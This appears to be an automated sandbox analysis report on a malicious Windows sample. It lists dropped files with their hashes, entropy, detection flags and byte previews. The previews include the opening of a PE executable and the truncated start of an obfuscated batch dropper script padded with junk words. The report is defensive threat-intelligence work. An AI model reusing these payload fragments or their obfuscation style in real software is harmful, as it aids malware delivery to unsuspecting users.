                                                    SHA-512:BB2B853B050B7F778011FB9359D1E57808EB3FF3A4905679254E66C3F9C3B1FD6CC18C5589B11E96037ECCE2B4CB06B73433CDC704FD312C232AF98BBC151C6E
                                                    Malicious:true
                                                    Preview:.8...tZ.{.|..>......<../.b..*....C zK.U5....M{..Mg.........Vx.U.I.}8......~.......!.U;..".....[.2........*NJ...y..pEmB...<[g'~"..U..V.,.*.f......E.K.M.......(.^.O..|.CKCU ..~S`h9V..F.9.k.V'.>..S.....i.m..YDA...p..Gx......9.A.....pi.$...KL.O...m^.cq...W.M.....5.&g.t.7...`...t..-*1..8x.PA.H...].}..9/7.b..........l....j.|...Wne]w.... A..F*-G.%.e.!..R.`t.<...7.".....gNM.?.5..$.eM...>1T............M\nZJ...?.-LZ..C..jO9bl?......I..."Y..{..^;.F)N....^."......./.\a4h......:..0^.e..Y1m...j.D.xgw..........n.....4..0N*...n+#..v..NQ.....".X@...d..Fg...'[......s.l.-a..<....X_~E]Y.8..T..?...*.h.U@.6\....7..p...]....ws..4-...X..>4'.......Ccn^.../.p...]....B.2kX.......~.WQF.\..dU.H..!...P1.....[.......}`7.kc..L.....N=-..Qf:...>......1..l...1....t..@..l.at.%..%.a........H.?.&1..kz...m...=.<....*.]d.V..$..4N..Z.Q.JA..W...*p...j.b.#n.{...=.@s[.}_....+..M..d.^..+~.y....QO.dG.<.....{.#r.c.3...H...}....9.9..g.qxr..~UoIl..oo8...T...........il..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:modified
                                                    Size (bytes):893608
                                                    Entropy (8bit):6.62028134425878
                                                    Encrypted:false
                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Joe Sandbox View:
                                                    • Filename: EO3RT0fEfb.exe, Detection: malicious
                                                    • Filename: RMBOriPHVJ.exe, Detection: malicious
                                                    • Filename: S6x3K8vzCA.exe, Detection: malicious
                                                    • Filename: PPbimZI4LV.exe, Detection: malicious
                                                    • Filename: l5VhEpwzJy.exe, Detection: malicious
                                                    • Filename: duyba.lnk.download.lnk, Detection: malicious
                                                    • Filename: pt8GJiNZDT.exe, Detection: malicious
                                                    • Filename: c2.hta, Detection: malicious
                                                    • Filename: c2.hta, Detection: malicious
                                                    • Filename: c2.hta, Detection: malicious
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1177035
                                                    Entropy (8bit):7.999838432083651
                                                    Encrypted:true
                                                    SSDEEP:24576:uWgaEyFxeBEglui3XzLBMX2rgfXG5KXZCN277jTzsc:0yFxAVumMX2rgfSKXoN277vzd
                                                    MD5:AB0020D503E99E956AB92579E6690327
                                                    SHA1:9E3ACD23F62F72CCABDBBCBAF21C31986FD694EA
                                                    SHA-256:14A900791A0CF3D1A98491DC6E108EA1C814B41579F33851CF7A02460B9F9387
                                                    SHA-512:BB2B853B050B7F778011FB9359D1E57808EB3FF3A4905679254E66C3F9C3B1FD6CC18C5589B11E96037ECCE2B4CB06B73433CDC704FD312C232AF98BBC151C6E
                                                    Malicious:true
                                                    Preview:.8...tZ.{.|..>......<../.b..*....C zK.U5....M{..Mg.........Vx.U.I.}8......~.......!.U;..".....[.2........*NJ...y..pEmB...<[g'~"..U..V.,.*.f......E.K.M.......(.^.O..|.CKCU ..~S`h9V..F.9.k.V'.>..S.....i.m..YDA...p..Gx......9.A.....pi.$...KL.O...m^.cq...W.M.....5.&g.t.7...`...t..-*1..8x.PA.H...].}..9/7.b..........l....j.|...Wne]w.... A..F*-G.%.e.!..R.`t.<...7.".....gNM.?.5..$.eM...>1T............M\nZJ...?.-LZ..C..jO9bl?......I..."Y..{..^;.F)N....^."......./.\a4h......:..0^.e..Y1m...j.D.xgw..........n.....4..0N*...n+#..v..NQ.....".X@...d..Fg...'[......s.l.-a..<....X_~E]Y.8..T..?...*.h.U@.6\....7..p...]....ws..4-...X..>4'.......Ccn^.../.p...]....B.2kX.......~.WQF.\..dU.H..!...P1.....[.......}`7.kc..L.....N=-..Qf:...>......1..l...1....t..@..l.at.%..%.a........H.?.&1..kz...m...=.<....*.]d.V..$..4N..Z.Q.JA..W...*p...j.b.#n.{...=.@s[.}_....+..M..d.^..+~.y....QO.dG.<.....{.#r.c.3...H...}....9.9..g.qxr..~UoIl..oo8...T...........il..
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):36299
                                                    Entropy (8bit):7.995142843999967
                                                    Encrypted:true
                                                    SSDEEP:768:hfbk8c2PiL7CZcLVF7u3yq2OvvRZ+4BKKMtwFMsKCWf+QJddWz6nHu:tSqZcv6yq2OvZJ52dIzd
                                                    MD5:48EEF161688B28BF638E0EC37DABB593
                                                    SHA1:DD30CC2936BD9BE8C977653FC8E0590A0A96D707
                                                    SHA-256:32873FBEC30BA467A770F8FA5D18AE9F5D30B383E1761036EC9CDF0491C9E57A
                                                    SHA-512:3C76F72DF956D71E79E6BFFF54D6A8FACEE0F6A41CE0D7CD564BBFBA48B1C381A49B3C61E91BCE6C84FE172C55C791CD65665E0D26E4F7356C4457B712A788C9
                                                    Malicious:true
                                                    Preview:...t.Pma....*..s.#$*,..yO....yo.+......d=..$?.c..>...I...3}.#..L7.......j.....l~.Up.b....j.F.]..}D...{.id........(PQcr.p.k3...~B.qmA..tn~C.c.vc....Pq....r...6y...c*W...2z..N4...0Qd2.P..C..S....9._..u......z.....x....93TX...Y.r).=..>..9I-!.\`.T.......6.@:.B...=M.....]..[Q...W.<.'.t.Z.pq...C....<.....-.{>...o.S..5@.ry..7~Z.E.....MY......._!.........lrE......u...45....._b.P...`(..,_.W. .}kE}.}x.>...1.....,:1......T...6M.C.i...lk..K.........M....EM#.xa$L.e...,.L{...;c...G\....a.3.VM...Xcq.L...6d..r[...Ff(..{..}..Mzpv..;..e*T.>..O.....4.I......(r...."....Q...H....J....e......|.eC)S}.^L....c...5n>.q9....p.......dv..-&.....<.^.....C...%...4..n.S..L.#......C.e. G...H..(....q...2.k."......(.h-Uc.4.k.e..wA..yO.1.@.#......I..g.............3V.[....,[U"4.w...X'T1...1n:../E.G... ...Z.YRL+*(.....^.9...W;5..c..1..N. k....D..<:.~@..>.].e.r!.....dz%.Q....7...:..s....0 ...R..Q#.......`..v+.._.....T.F. ....E....)!...].#...........%.....=.&..i."O.c........g....'...aB0
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:DOS executable (COM, 0x8C-variant)
                                                    Category:dropped
                                                    Size (bytes):93184
                                                    Entropy (8bit):7.998062404457295
                                                    Encrypted:true
                                                    SSDEEP:1536:oA8gnQiP6RbR5TZJHTPs1GZO7ktznBUDjnMTcWh3FFHkPFGUFcAw2xNhz:m3iPEhTPs1GZO7k1nwDMJ3Pkzcyp
                                                    MD5:73F15B295CA059461F4CCEA25DD9A56A
                                                    SHA1:0B2834B85A315A2417C7AB51842937F3AD2E34DD
                                                    SHA-256:CF1527A390FE3B945F60BA46F139D5EFCC8B20712A6388FE0FF99CAD6B661CF8
                                                    SHA-512:31A459460A7D1C65AFFE2E085AC3835BF2C40EF0112F3C11AD6821B56A452B1EA53F5BF31FE2C83DBDE689D381506E54729BC515DA8E8F86BF6AE1F0785DB0CE
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:.......;. !..t&.J".'.6.+....&{.z....$...9.3.p8i..;.76z.....y......+xuz......p..Q.p.Ub...&.h........P..4."...t..A`...".R....h.,.M/.4.`.....7ZW.bp...KE....)`........V.nFG.Z......Y7....[:($..Z%...m....Q.?.@.k"(.*...Q..e".).s....W|.HMR..^Vs..Z....k.`..J.fG.3 .t..:.4./;.....%...</.......y]@..0...../.?hw.....{x.g....A....|.0{.*.../.}O.P.:.n...{.vw^.v<z.Oiv(...49..1s...w<...gt..!b.t.XhM.?..<.8.U...m.i_I...hMNc..-.t.....Y=........"A.d...tvt.^..5T...G.8Y.u4%W..+..:..I..<.........Y..K.$!.?Y.....AA......;]..g...,..a.j....RlS..i.ll.F.FD.^.(7\x.]..!..:DP^..>.l=m.T..R.......:...aj.......$......3........_bh...sT-ar..b......gp....0MR.&.R....G92U.`"...[...8k..>(.'....R. .N8.y.....`.6.A.a....@....x..^...BQ/L.<...m....e...X...b......z...U..]...5x$.%..RK.S....a.R.5.z.A.F..$;6W...I.0..9.,....4%....u...m...RB.....@..`.(."Qj...e...s*..L.=o#4../.0.K.#Et.BQo..UX.....>..G.F.|#]..F..UE.L..M...C.I...x.%q.(.~.. d.Sj.#s9.n..w<...%.+,v.f...hZ..Z..'f$...l..A.9K.3...
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):94208
                                                    Entropy (8bit):7.997963539367384
                                                    Encrypted:true
                                                    SSDEEP:1536:Getdq5yUrLGdyN60kxmcPu37oudLvidDCG4jx3yF8+Z3v8jdUU1tq00toMT:GetdqnidyNdmRGc2L+CcF8+Z0xUU1tqX
                                                    MD5:75257307B8D4D5B354711B1AFB9807B9
                                                    SHA1:F61C1599DEA1E8BCA46CF7176F5C367FC6C682F9
                                                    SHA-256:7F34EA53E7774CE8455BF3EC2F6A38CA870740B05D866073ABF8738874212DE1
                                                    SHA-512:B1317965AADC83E85CE16A839FAD180AC2BF0356BA305D1D14D33E22ECE8B7980CB5C9543E40B5C6830F626749AC233E4C2CB6A925DC72A8F85C49BD5FD67BDC
                                                    Malicious:true
                                                    Preview:..<...!......\.....[.N8...X.{..?.Z%Z.z...... ..{.<$..2..........<....-..8.K...!..3G..5.Q..,.X0..2.\.....@......S...y......R>....."..n$r..?..[...gX(.P.D16Y..I.-.$........K....R.....|.#...w..[3?....y9YN.?.#..H\X.......d..k...29...../....+.v/....S...=....8..=.?||...a.M..g.1......+b.16.H.K..>....g.~.q9..z.[7\bG....2u1.n...(.....*.1...x.........%.S._.........V/.6..P..P6.G..Op.x(.1VvE.{..-.3."&=*.....]..@.Q.,...S..CmBh.(....&......#..|.u..).6S>..Y.u...wY@..R.w..4.A.W.]x.Q\.x.]y.m.'.S9.M....<K.. ..G9...-.x......d.xTk....~..>\H.....11..Zl..o......e....~.+$)...P.b.7..I...c..F.!.W.&.x..i..=..k{..=......dY!c......UJUX...'E..%.......-.`.ut..o..A.C/....c.u......:.Yp...\;..PTyw....ap.../C..r..OM(....t.........ft.h<...2...<.t7...?.G..c.....2.J...-"....[.#.^c....X.-G,.^2............VX....O.&.....(E:...M..h .+.).o.NG..........I.s.{......l.hWmt...5o.]..!W.">..:/rr.O...).... FE....1UC........t.rs..d...D.6.#V....k0.L...&&..g...,....w..`.[...w
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):96256
                                                    Entropy (8bit):7.998514868354388
                                                    Encrypted:true
                                                    SSDEEP:1536:IvdYLR3NuhKqrKEN3tMdLgN/AfOTtbxaKiA9G0FnCerGGg/WTEFiIeHrygOI+T:IvdeRq39Mpg+fO/7ieGACmgyEF8ZOx
                                                    MD5:C4E8EDFE5D08067625B63F23C2E8FB8A
                                                    SHA1:D76FA360F0FE278C791442E9208A591C86476AF3
                                                    SHA-256:B5638AA2E4141715075A21BA1D69D2E8B53E5CF055564C9E2B80E20A5340A766
                                                    SHA-512:1AB6204134558D8AA28D43E7B860B57FAC12DA3F653A34FB5892D9241B04E7CBFFF3B5F8F8C2623F7354D0F9DF1078B19532F64CBD029D2D32B4D17863BD345F
                                                    Malicious:true
                                                    Preview:.8...tZ.{.|..>......<../.b..*....C zK.U5....M{..Mg.........Vx.U.I.}8......~.......!.U;..".....[.2........*NJ...y..pEmB...<[g'~"..U..V.,.*.f......E.K.M.......(.^.O..|.CKCU ..~S`h9V..F.9.k.V'.>..S.....i.m..YDA...p..Gx......9.A.....pi.$...KL.O...m^.cq...W.M.....5.&g.t.7...`...t..-*1..8x.PA.H...].}..9/7.b..........l....j.|...Wne]w.... A..F*-G.%.e.!..R.`t.<...7.".....gNM.?.5..$.eM...>1T............M\nZJ...?.-LZ..C..jO9bl?......I..."Y..{..^;.F)N....^."......./.\a4h......:..0^.e..Y1m...j.D.xgw..........n.....4..0N*...n+#..v..NQ.....".X@...d..Fg...'[......s.l.-a..<....X_~E]Y.8..T..?...*.h.U@.6\....7..p...]....ws..4-...X..>4'.......Ccn^.../.p...]....B.2kX.......~.WQF.\..dU.H..!...P1.....[.......}`7.kc..L.....N=-..Qf:...>......1..l...1....t..@..l.at.%..%.a........H.?.&1..kz...m...=.<....*.]d.V..$..4N..Z.Q.JA..W...*p...j.b.#n.{...=.@s[.}_....+..M..d.^..+~.y....QO.dG.<.....{.#r.c.3...H...}....9.9..g.qxr..~UoIl..oo8...T...........il..
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:ASCII text, with very long lines (687), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):13560
                                                    Entropy (8bit):5.152446332556762
                                                    Encrypted:false
                                                    SSDEEP:384:vA5nkQWyUEMHlWiSDhV5qRwcbar5DrwcqEw/D486HsT2pn:vAVk5yUZHlWiSDDTrBrfqjc8wRpn
                                                    MD5:D85FE4F4F91482191B18B60437C1944D
                                                    SHA1:C639206AD03A4FCC600CE0F7F3D5F83AD1F505A1
                                                    SHA-256:55941822431D9EB34DEAEF5917640E119FCD746F2D3985E211A2FF4A9C48FF92
                                                    SHA-512:BD5E46C10DEC7D40E0151DABB28C77B077CE9BC2B853B01DECBCD296F6269051A01115C349DC094BBCF14153A13395FC7E5AB74DD53EB5B2DFBC4BF856692B09
                                                    Malicious:false
                                                    Preview:Set Fellow=r..EOtCosmetics-Sell-..tGMEArmenia-Fraud-..oPInstalling-Acquire-Groups-Americans-Promises-Ma-Wise-..QhqReligious-Ja-Desire-Frederick-Blowing-Sv-Legislative-Mileage-Fax-..isAHurricane-Damn-Inner-Efficient-..Set Mall=N..hacMapping-..debBillion-Channel-Integration-Might-Recorder-Bingo-..MCxAShower-Australian-Calculate-Tail-..xPWit-Lazy-..PzBasketball-Areas-Listening-Centered-Away-..kbCollectables-Temp-..Set Saskatchewan=X..UppaInnocent-Eugene-Examinations-Rw-..TvbSCocks-Statute-Flat-Mortality-Dominant-Metres-Sufficient-Seekers-Headset-..ZkMariah-..PASpot-..BoCrop-Publicly-Mel-..EvjlFinding-..LEhPhp-Earned-Aging-Greg-..gajhLight-Cod-Flat-Harm-Noted-Mounts-Further-..EuQuebec-Notice-Drinking-Front-Claimed-Symptoms-Vampire-Supporting-..RIBFrames-Membership-..Set Fluid=V..iQmEmployed-Single-Norway-Cloudy-Toy-..WfQReached-Glucose-..maePj-Atlas-Proof-..FYeNm-Throat-Spreading-..ojcSmile-..QCOperator-Browsers-Talented-Colonial-Hewlett-Subscriptions-Em-Interesting-Therapeutic-..Set Lodge
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with very long lines (687), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):13560
                                                    Entropy (8bit):5.152446332556762
                                                    Encrypted:false
                                                    SSDEEP:384:vA5nkQWyUEMHlWiSDhV5qRwcbar5DrwcqEw/D486HsT2pn:vAVk5yUZHlWiSDDTrBrfqjc8wRpn
                                                    MD5:D85FE4F4F91482191B18B60437C1944D
                                                    SHA1:C639206AD03A4FCC600CE0F7F3D5F83AD1F505A1
                                                    SHA-256:55941822431D9EB34DEAEF5917640E119FCD746F2D3985E211A2FF4A9C48FF92
                                                    SHA-512:BD5E46C10DEC7D40E0151DABB28C77B077CE9BC2B853B01DECBCD296F6269051A01115C349DC094BBCF14153A13395FC7E5AB74DD53EB5B2DFBC4BF856692B09
                                                    Malicious:false
                                                    Preview:Set Fellow=r..EOtCosmetics-Sell-..tGMEArmenia-Fraud-..oPInstalling-Acquire-Groups-Americans-Promises-Ma-Wise-..QhqReligious-Ja-Desire-Frederick-Blowing-Sv-Legislative-Mileage-Fax-..isAHurricane-Damn-Inner-Efficient-..Set Mall=N..hacMapping-..debBillion-Channel-Integration-Might-Recorder-Bingo-..MCxAShower-Australian-Calculate-Tail-..xPWit-Lazy-..PzBasketball-Areas-Listening-Centered-Away-..kbCollectables-Temp-..Set Saskatchewan=X..UppaInnocent-Eugene-Examinations-Rw-..TvbSCocks-Statute-Flat-Mortality-Dominant-Metres-Sufficient-Seekers-Headset-..ZkMariah-..PASpot-..BoCrop-Publicly-Mel-..EvjlFinding-..LEhPhp-Earned-Aging-Greg-..gajhLight-Cod-Flat-Harm-Noted-Mounts-Further-..EuQuebec-Notice-Drinking-Front-Claimed-Symptoms-Vampire-Supporting-..RIBFrames-Membership-..Set Fluid=V..iQmEmployed-Single-Norway-Cloudy-Toy-..WfQReached-Glucose-..maePj-Atlas-Proof-..FYeNm-Throat-Spreading-..ojcSmile-..QCOperator-Browsers-Talented-Colonial-Hewlett-Subscriptions-Em-Interesting-Therapeutic-..Set Lodge
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):81920
                                                    Entropy (8bit):7.997721698642565
                                                    Encrypted:true
                                                    SSDEEP:1536:YReT3S6RaPlwij6WqGnCf/x9TkXGr8nwvp1aYzERXM7Wi:48hRGwlGS/8XGr8n2pBgXXi
                                                    MD5:7B60F0D191C0904F3F5BE40433D86F73
                                                    SHA1:E6B09A6670797332B8861FC93F44DA7CF224BBCB
                                                    SHA-256:AA1CC0C31C1C15CCFF224BA06596D8DEF6F510280F077BA201650F18B0D67D90
                                                    SHA-512:1D8FF33C53794E3467968F747172DBFDC362E99E24CE6652A0860FE4094D5A861ED2E2C307577FE033AF39836268BC6EF2CDB331AE8FB3B58F2FC7A3EBA257A8
                                                    Malicious:true
                                                    Preview:.o...A....tucp..HQ{.\..,0Y.pQ...L*....d....?..9(.&6.ph....a?.!.U....-l.!......{..dI.].....K........k#.MI.U....9.o.....s.......d.....c.......4W....b........<[..d.^...C..t.P.S|&bO.jQ.N;X[...I.he6..f...l8...#....O...vK.}2K.AV.K...A...w.(.....<P...s.b....h.@..[Y..`F..e.S..;../.h..e.F.r/...D6.`._.8Q..Z.......[..f..P....&.t@....^.....3.z8R.D.....O...{C.o4.Qj.w.J.ua..1...C.c.W.o...c.../.d..5.W...u..q...r...1.K....Y.d.._.......!...~\_1\..09....i.N...z...(.)......d....D...,....e.&y.`.......S.X..0.v..X../T.n..Uy.M..&..x....n.D)G..(....D.@.....2>...}.l......#eE.=...$.+".u?r....k..n.x..7g,.3....i....j.0_...D.lh'.C..&K....?..|..y..'........k.YQ..O..a........D.]&.uP..Z..h.N......R..`.....jo..m.]/..+._:<.....!...........\WR. ..%7Ymp~+.B%.p......f.^...i....9....n{.W. .I..YT.3.b..m.D.h".yW.d.'.f.....~Q#..F....Dii.qm..IB...I.+.%......].I6u&.u&%.l..?.f.(....>Q....&$..|j.H.Y)dO.l&..r_..C."Z.&.'.r...h.CZ.IU....r.......>...>.....%..*......t.`.b.....P.PB"
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):7.997194265654002
                                                    Encrypted:true
                                                    SSDEEP:1536:v+pxZi1WY75TwdFzkQIfiLiR5fARQvjc9fdWx3L4wRrvTkTppGc:v0S5Jk+QIKirYaQpUx39c
                                                    MD5:EFF591562D9AEA14D2872367F7B7103E
                                                    SHA1:464E462445DC343E316FFCB6B29234C446D0A064
                                                    SHA-256:5482A9A3B48354EB14C55DDB9E2595E79B03615C93464FD0F5FDD6E208AF4F82
                                                    SHA-512:C75FA0300B30B71DE261982BE233E41A96E00E0B83FA4A9AD163FD3E740B1A2EFAC99435A1887459F6234F6BDE7ED5D9D53C1B26AE4F0414561A03E38AFCDCDD
                                                    Malicious:true
                                                    Preview:[..>K..F.`.>86.!.3...........^.....|./.J.CHE2.{..C_...F9l..`XW6.H.....;\...:.b..'..c.Y....>..\.\...vX..6; .(.....0...0.....V.S.J.v.J..}3.....>.}f.7............=,.+Z...Fs}.g%..w.......$..`.S.....z.].Q.s.=... .e@).&...F....%Ayc!.PJ....=.k.x.....v...Y~[....G.....*........T.n...|.u.....M..iA6E(..E.I..yNk.l...,{....(.!R..........H....'.s.Rg<m5w`.Y....q..#,......T.O.94...c.V..... 4m9..m...m[...:.q...'.0......m..........x.....3.U....{....Uvxq..>U...k^fr.$q..a.cr^w.T...A.F.ma&......hu.9.{.a...)....o..,....M.....T..=....j.v...iH.o.09"1...[......-.2..mg..m...F./U..F.T.&..z...r.....U.}.w6..$0fN....!...d..@...u.....c.NY.-.."..m.^.BA.:..Z..,.0..E....e.........S).-....P...Og@]kdRVF..9..p..*.S....~p......=R..vyAN.....n.....X.2...7.F.....M.v.,..t.XH<Yr........Q.=n9Z.P...8f.#:...k ;].wuT....]5..8......-..R.>.u..g..:7B..#2.a....u..@..(.......\...I^.1i\.q.`....QW.e..ga..A..5..,.....e^4!i......I.{3~.S..|.......1Z....9.@r...Y<_.....5.;..9...&.....
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):59392
                                                    Entropy (8bit):7.996765889888764
                                                    Encrypted:true
                                                    SSDEEP:1536:awFUJIg3MqmVC8RUIvzJb+OriV7i8svKR5L8LXaIBMm83qclL:bUKg3pmVC8Rl+Zt1qIeeoG3qc5
                                                    MD5:0B20ABB260FC790E78F84A960314499D
                                                    SHA1:631654EB5A843F48D7D4F75A95305CF738A92500
                                                    SHA-256:7491C99CCA33B24B2F8BD2EA72561D60154E51142796C28A46D32C2DB5E972B1
                                                    SHA-512:6CA15FD999A40CF37AF80A2BA79A5ADC45F997D978B8051CF3D0C858AB26C2DED9D6CFAEDECAE1DDAAF1AFCEE2B9B72FF6E38064B8AECEF3BD4AC4314BDAA43D
                                                    Malicious:true
                                                    Preview:..Zp..uz..>.-.N..5.../.$l.S.`J..(..-D..0.~......$p.RT..5Y#.M.[.F.i*...S.nf...4.X..{.M....%.....JD...nN.C.k.?.A&.c*.....x...r.Z.S....pu.2.AKR.m\..\;...1.w..+....z..$..b..Q)..gyfhW..8......./W.......zBj.{k.9...;.....k?)...an.q....C.ms...@..^..L.W......b.d.\.......x........U.\h..T.l...o.&..u"...[3?.P*3@.H..'..'X..!.DL...t%.8X[ ..r4..DM{2j.U..1.O.......5...Z.Z.$../..u..`.C.S... .n.....a...K..\e2................nyv....'A...14..O.I./L......c...f}....t.r..~G)...^E..^F...l..;3.>..&RV...@..e...>.....Z.E...5..6.>R<.....!...3....a..qWs59.*....K... ....<.Z.d.d`$..w..0.C..<..^&..X.:.S.....Y...\..../\..../.ZDC....9..=@.>O.#.......,l.n.....V...J....R............+P`8m.D....TU.=.....<v.z],.%.../b..>R..kf..2.z..D]SH+6X....a.t.....T.....7U..l.$.%..M.t....?6..{.i~.E..*_P..o...A.WS.g.....o.........U:q...+2...+?..;.9]H.{y.......P.{QL.......Fl...^M...?g......]....7.th}j..Z..l.......6.\...C.b..<..:..B..G.....VC..%..P...O..........dr..Ad.#.$.....Cm
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):54272
                                                    Entropy (8bit):7.996455408231238
                                                    Encrypted:true
                                                    SSDEEP:768:872ws5O3wKoSCM0ZV4EdtkFb5iezgE6kZn3RKcZweWZvNB+0EQuHmEchpW77Q2xB:C2xuDVC7s4eIsnB5ZwbNNsOEq245q1b
                                                    MD5:24548BC705858B908DF8590C42555E34
                                                    SHA1:DC16D01B52B94E0BFA33BF8124F8E55ABE1720A6
                                                    SHA-256:B15854B830337EF3DB8458995B59B02037839D4C7D2EEB69124344E29AE77671
                                                    SHA-512:F3C5D612BE5784B73255F5A0380E38FE116BC39D3B261582CB748C91CA098AD02D25DDDEAA57216F0B7E30589F3FA296E2945D8C4A3C04CC347AB0187EF08834
                                                    Malicious:true
                                                    Preview:...k\}.i.[o&....`q.!a...{.....,!...Y;.r..D.....!!..=.G=..C.6.S"s...V1..b..J..=9.;C..M.D...qA>A/Sr|...!.....g..s..#........YU.1...t......".T.......2/.......GA....'B3.k.....U>.KQcd.`.]LtN./....m....e3..Jf.]....g...(7b.....~.{.........".....W.M.4..W7...~..Q....h..=@.q....p...2v"...9.u..K...wB....."~...s..G.1.`...7#{a..... U[Y:!.......4N61.}...:.\.[..jgm..f.|&...%....#.y.c..LV....../O......N#.....u2..$}.P..{].....,./....y.2......).R..@X...e....3......o.<.k.K.X....".h.R....Kd..iq.~C9.'.XS3.D{.hp...."...]]D.... |7e.2..(.u;.W.&...~-.:w...a...?.>.......D...UX......C........I.-...s.....f.IJ".x..6K6..!....s..hK....m+@....y...U".b........km.1...U....`..>!x....4...;.O..Ov|....>Qc.br..yq7....J.j>...m...i...Ou..y....W....u...s!V5.i.o.dw...1..g|..G%.q3....\..M............5.Y;*].c..N[....4EF...9.S.)...\.N.{n..A.]O..$jZ.*~aG..R.s`,.@...J4.B....=.@i.;..4..)m.*..d."g#......I...?...G.D.M.V.2..(n@J..:.T=....vk.q+...s.wbX...J..S..1.J.&...,{..K].l.x...
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):101376
                                                    Entropy (8bit):7.997914373248418
                                                    Encrypted:true
                                                    SSDEEP:1536:1H16MKOSG3fStcKwt97Fr6dj4go6KzouYbHYqEVSBjAFYI26wf9kp9ZB2lyDNumy:PxaG3atO77FedscQcYLfYN6wM7PO8E
                                                    MD5:25AA98D5EF3952A5A0BFF32301C09AD8
                                                    SHA1:569DD803FC9CFFA01C159C650648A3F627635000
                                                    SHA-256:3377FF0A28AC9AD8BA3C164CE29503AB3E4BE2632978BC519859B59B3C9E6A16
                                                    SHA-512:5C260F85F498D04E8F9CBFDF63521A86D69E8E60F2E5971CA3F95559B444B791F3F47C403D84193FF84C962214FF57ED9D6710AAA4059F78406AB220BC23371E
                                                    Malicious:true
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):61440
                                                    Entropy (8bit):7.997269818226767
                                                    Encrypted:true
                                                    SSDEEP:1536:MXrI/MNgZ4Og0Rjihiu9qxwil6DIFcNZe:MXrI/fKYo6eZe
                                                    MD5:1C80BC738D8205B5D4C2B2445CBB31F0
                                                    SHA1:253BEC88BE97A71788D6152908CDBA73E55B46A3
                                                    SHA-256:492E8EE10FE8D95577C96FF4CE184DF20560207DF7D1631948328B960434FA61
                                                    SHA-512:1F299A0C55197C780D65D00909447EBCD5703EF9426AA6844C2897D572B3AAF555C2ED20C5BBDA965C8B25232F5A79DCF749417DF7915A60E6621DD1E16BF6EE
                                                    Malicious:true
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):5636
                                                    Entropy (8bit):6.0876490146743425
                                                    Encrypted:false
                                                    SSDEEP:96:kfkxgUzr4tgOwVAfBzDICS09CAi6R7u+IhsObfS+NsPvj6ooxdofjxP3yGj1H034:smHAeOqAFDw09CV/2nPvj6DdMP3r1HI4
                                                    MD5:598774EC6001A83BC8A24565E2A908BB
                                                    SHA1:503438709CF002913D96E2A7EF51325B0605A64E
                                                    SHA-256:79749AF598CD4506AD7AEFE35BA2CB8AC24CE4961E225E5DF345A95304AF1678
                                                    SHA-512:0BDE914E7AFA80DFCEBA929C53C239FEAF0C21200C245D606CFFBF8E9AF1525F57B21E96F003DC4C4EC29120C641598CEA6EFB51530D542C83B989202E31A670
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):87040
                                                    Entropy (8bit):7.9979586106795955
                                                    Encrypted:true
                                                    SSDEEP:1536:1w4kfylR3M4LxsCKKb5y+IWYzr0V0Ni6NNq6wOydrqcSusn+WLjkZeYctHeYIlhk:1/kaozzKNy+6PBhzwOGrBsn+WLjkZeu4
                                                    MD5:7B0DEE84D05813B43B680C8FEAED52DF
                                                    SHA1:6831401C9BDB63B42E6AE66B5B3A619A81BC07F4
                                                    SHA-256:CC15CDF080BFC8C16B669782B545C9FF15633ADA54809FCF6BE8311E1EF684EE
